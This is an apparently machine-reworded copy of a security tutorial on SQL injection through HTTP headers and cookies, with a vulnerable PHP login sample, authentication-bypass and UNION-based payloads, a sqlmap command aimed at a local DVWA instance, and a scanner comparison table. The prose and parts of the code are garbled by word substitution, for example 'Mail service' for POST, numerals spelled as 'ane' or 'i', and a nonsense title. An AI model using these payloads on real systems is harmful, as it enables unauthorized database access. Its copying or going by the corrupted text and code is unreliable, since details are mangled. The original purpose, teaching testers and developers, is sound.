Udp Header Protects Agains Blind Injection Arracks
During vulnerability assessment or penetration testing, identifying the input vectors of the target application is a primordial pace. Sometimes, when dealing with Web application testing, verification routines related to SQL injection flaws discovery are restricted to the GET and Mail service variables as the unique inputs vectors always.
What about other HTTP header parameters? Aren't they potential input vectors for SQL injection attacks? How tin can one test all these HTTP parameters and which vulnerability scanners to use in lodge to avoid leaving vulnerabilities undiscovered in parts of the application?
Input parameter coverage in security web application scanners
A result of a comparison of lx commercial and open-source black box web application vulnerability scanners was released and titled: « The Scanning Legion: Spider web Application Scanners Accurateness Assessment & Feature Comparison ». This benchmark, realized past the security researcher Shay Chen in 2011, focused on testing commercial and open source tools that are able to discover (and not necessarily exploit) security vulnerabilities on a wide range of URLs.
We have ended the chart below which shows input parameter's coverage supported by tested web awarding scanners. These inputs are basically:
- HTTP Query Cord Parameters (GET): input parameters sent in the URL.
- HTTP Body Parameters (POST): input parameters sent in the HTTP body.
- HTTP Cookie Parameters: input parameters sent in the HTTP cookie.
- HTTP Headers: HTTP request headers used by the application.
75% of Web awarding scanners couldn't discover HTTP Headers parameters related flaws. Furthermore, seventy% of these scanners failed inspecting HTTP Cookies vulnerabilities else. These rates refer exactly to the ability of the scanners to scan the input vector, not simply to interpret it. Comparing to the reasonable score made for GET and Mail service, some automated testing tools may lead to unsatisfied results when dealing with HTTP header equally an SQL injection input vector.
Every bit a matter of fact, HTTP Headers and Cookies should not exist underestimated. Therefore, these two vectors should exist taken into consideration during testing plan. Yet, when the vulnerability scanners used are not supporting these features, we should think most testing these parameters manually.
Potential HTTP headers for SQL injections
HTTP header fields
HTTP header fields are components of the message header of requests and responses in the Hypertext Transfer Protocol (HTTP). They define the operating parameters of an HTTP transaction.
Example: Request HTTP
Get / HTTP/1.1
Connection: Continue-Alive
Go along-Alive: 300
Accept:*/*
Host: host
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Amanuensis: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-The states;
rv:one.9.2.sixteen) Gecko/20110319 Firefox/3.6.xvi ( .NET CLR 3.5.30729; .NET4.0E)
Cookie: guest_id=v1%3A1328019064; pid=v1%3A1328839311134
We can consider the HTTP Cookies, when are stored in databases for sessions identification, as the first potential HTTP variables which should be tested. We will see next in an example of Cookie based SQL injection. There are as well other HTTP headers related to the application.
Ten-Forwarded-For
10-Forwarded-For is an HTTP header field considered as a de facto standard for identifying the originating IP accost of a client connecting to a web server through an HTTP proxy or load balancer.
We will see an case of this flaw basing of a form submission.
$req = mysql_query("SELECT user,password FROM admins WHERE user='".sanitize($_POST['user'])."' AND password='".md5($_POST['password'])."' AND ip_adr='".ip_adr()."'");
The variable login is correctly controlled due to the sanitize() method.
office sanitize($param){ if (is_numeric($param)) { return $param; } else { return mysql_real_escape_string($param); } }
Let us inspect the ip variable. Information technology is allocating the output of the ip_addr() method.
function ip_adr() { if
(isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $ip_adr = $_SERVER['HTTP_X_FORWARDED_FOR']; } else { $ip_adr = $_SERVER["REMOTE_ADDR"]; } if (preg_match("#^[0-9]{ane,3}.[0-9]{i,3}.[0-9]{one,3}.[0-9]{1,three}#",$ip_addr)) { return $ip_adr; } else { return $_SERVER["REMOTE_ADDR"]; } }
Obviously, the IP accost is retrieved from the HTTP header X_FORWARDED_FOR. This later on is controlled past the preg_match which verifies if this parameter does concord at to the lowest degree one IP address. Equally a matter of fact, the environment variable HTTP_X_FORWARDED_FOR is non properly sanitized before its value beingness used in the SQL query. This can lead to run whatsoever SQL query by injecting arbitrary SQL code into this field.
The simple modification of this header field to something similar:
Get /index.php HTTP/i.1
Host: [host]
X_FORWARDED_FOR :127.0.0.1' or ane=1#
will lead to bypass the authentication control.
User-agent
User agent is an HTTP header field gives the software programme used past the original client. This is for statistical purposes and the tracing of protocol violations. Information technology should exist included. The showtime white space delimited discussion must exist the software product name, with an optional slash and version designator.
Non all applications are written to capture the user-agent data, just sometimes applications are designed to store such information (ex: shopping cart providers) to brand use of it. In this case, information technology's worth investigating the user-agent header for possible issues.
HTTP query example:
Get /index.php HTTP/1.1
Host: [host]
User-Agent: aaa' or 1/*
Referer
Referer is another HTTP header which can be vulnerable to SQL injection once the application is storing information technology in database without sanitizing it. It'southward an optional header field that allows the client to specify, for the server's do good, the accost ( URI ) of the document (or chemical element inside the certificate) from which the URI in the request was obtained. This allows a server to generate lists of dorsum-links to documents, for involvement, logging, etc. Information technology allows bad links to be traced for maintenance.
Instance:
Become /index.php HTTP/1.1
Host: [host]
User-Agent: aaa' or ane/*
Referer: http://www.yaboukir.com
Attacker'southward perspective?
Equally we all know, injection flaws are ranked the first in The OWASP Height ten Web Application Security Risks. Attackers are increasingly seeking for injection points to get full access of your databases. No matter the injection input vector's type, whether it's a Become, Post, Cookie or other HTTP headers; the important for intruders is ever to have at least ane injection betoken which let them start the exploitation phase.
Manually testing Cookie based SQL injections
In this department, we will introduce some methods of inspecting HTTP Cookie variables.
Using a browsers addition
Cookies Manager+
Cookie Director+ allows view, edit and create new cookies. It too allows show extra information nearly cookies and allows edit multiple cookies at in one case, likewise as backup/restore them.
After installing it, from the Tools carte du jour, select Cookies Manager+.We select a Cookie variable related to the target application.
We will edit the language_id variable. To figure out the SQL injection flaw, nosotros will add a quote "'" in the field
content of the variable language_id.
After refreshing the page, or clicking on other internal link of the application, the application submits the request using the edited HTTP cookie. The result is triggered an SQL error:
This database error is alerting us for a susceptible SQL injection flaw.
The advantage of using Cookies Managing director+ is that it's uncomplicated to use, deed direct on the cookie and saves the previous edited value of the cookie.
We volition attempt to decide the number of column using another Firefox plug-in.
Tamper Data
Tamper Information is a powerful Firefox improver to view and modify HTTP/HTTPS headers and post parameters.
Afterward installing it, from the Tools menu, select Tamper Data. First tampering HTTP request by clicking the push Get-go Tamper.
When launching any request from the target application, Tamper Data pops upwards a box and asks if we want to tamper the current HTTP request simply sent.
Subsequently clicking on Tamper,we got the full Tamper popup:
We add: order by 4 into the HTTP cookie variable equally shown in the previous screenshot. The response is normal from the awarding.
We increment the number and add this time: social club past 5. The response to this injection is every bit follows:
And then nosotros tin can conclude that the number of columns is 4.
Now, we will try to figure out the affected columns in social club to inject in it more SQL queries. And then, nosotros will add the following query into the language_id HTTP cookie variable:
-ane+Wedlock+ALL+SELECT+1,2,3,four
The exploitation may demand sometimes advanced SQL injection techniques.
Using automated penetration testing scanner
Sqlmap equally example
Sqlmap is a pop open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers.
Sqlmap supports the HTTP cookie features so it tin can be useful in two ways:
- Authentication based upon cookies when the web application requires that.
- Detection and exploitation of SQL injection on such header values.
By default sqlmap tests all GET parameters and POST parameters. When the value of –level is set to 2 or in a higher place it tests also HTTP Cookie header values. When this value is ready to 3 or in a higher place, it tests also HTTP User-Agent and HTTP Referer header value for SQL injections. Information technology is however possible to manually specify a comma-separated list of parameter(s) that you desire sqlmap to test. This will bypass the dependence on the value of –level too.
| Tested HTTP parameter | Level in sqlmap |
| Go | 1 (Default) |
| Post | 1 (Default) |
| HTTP Cookie | 2 ≥ |
| HTTP User-Agent | iii ≥ |
| HTTP Referer | three ≥ |
For case, to test for GET parameter id and for HTTP User-Agent only, provide -p id,user-agent.
This is an example of how we tin can test the parameter named security of an HTTP Cookie of the DVWA (Damn Vulnerable Spider web Application).
./sqlmap.py -u 'http://127.0.0.ane/vulnerabilities/sqli/?id=1&Submit=Submit#'
--cookie='PHPSESSID=0e4jfbrgd8190ig3uba7rvsip1; security=low'
--string='First name' --dbs --level three -p PHPSESSID
The flag –string compare between the valid pages and the invalid one (due to the injection). In the other hand, the flag –dbs is used to enumerate the database management systems. Finally, the flag –p force the testing of the PHPSESSID variable.
Tools for testing SQL injection: cull by its detection accuracy or by its input vector coverage?
In gild to answer this question, nosotros have exploited the results of the benchmark provided by sectoolmarket.com. Nosotros have accept in hypothesis that the detection accuracy of the candidate scanners has the aforementioned importance equally input vectors coverage and support. Nosotros have considered GET, POST, HTTP Cookie and HTTP Headers every bit the input vectors that should be supported. When all these parameters are supported, the scanners make a rate 100% of coverage (four/4).
We suggest the equation below of arithmetics mean to conform a balancing score for vulnerability scanners.
After balancing the obtained rates with the percentage of detection accuracy, we stopped by this consequence beneath for the first 14 scanners:
| Vulnerability Scanner | Vendor | Detection Rate | Average Score |
| Arachni | Tasos Laskos | 100.00% | 100.00% |
| Sqlmap | sqlmap developers | 97.06% | 98,53% |
| IBM AppScan | IBM Security Sys Division | 93.38% | 96,69% |
| Acunetix WVS | Acunetix | 89.71% | 94,85% |
| NTOSpider | NT OBJECTives | 85.29% | 92,64% |
| Nessus | Tenable Network Security | 82.35% | 91,17% |
| WebInspect | HP Apps Security Center | 75.74% | 87,87% |
| Burp Suite Pro | PortSwigger | 72.06% | 86,03% |
| Cenzic Pro | Cenzic | 63.24% | 81,62% |
| SkipFish | Michal Zalewski – Google | 50.74% | 75,37% |
| Wapiti | OWASP | 100.00% | 75.00% |
| Netsparker | Mavituna Security | 98.00% | 74.00% |
| Paros Pro | MileSCAN Technologies | 93.38% | 71,69% |
| ZAP | OWASP | 77,21% | 63,60% |
What's next?
For developers
Cookies and other stored HTTP headers should be treated by developers equally another course of user input and be subjected to the aforementioned validation routines.
For testers
The manipulation of HTTP header information on page requests (especially the REFERER and USER-Agent fields) is important to place whether the application is vulnerable to SQL Injection vectors or even to other standard vulnerabilities (XSS). Information technology'due south a proficient practice to ascertain and describe every fashion that a user may manipulate data which is used past the awarding. These data may exist stored, fetched and processed from Cookies, HTTP-headers (similar HTTP_USER_AGENT ), class-variables (visible and subconscious), Ajax-, JQuery-, XML-requests.
Sources
- Penetration Testing with Improved Input Vector Identification, William G.J. Halfond, Shauvik Roy Choudhary, and Alessandro Orso College of Computing Georgia Institute of Applied science
- Security Tools Benchmarking – By Shay-Chen
- Wikipedia
- Tech brunch SQL injection
- W3 HTML headers
- W3 Protocols Headers
- Mozilla Cookies manager plus
- Mozilla addon tamper data
- Sourceforge
- Msdn Microsoft
Source: https://resources.infosecinstitute.com/topic/sql-injection-http-headers/
Postar um comentário for "Udp Header Protects Agains Blind Injection Arracks"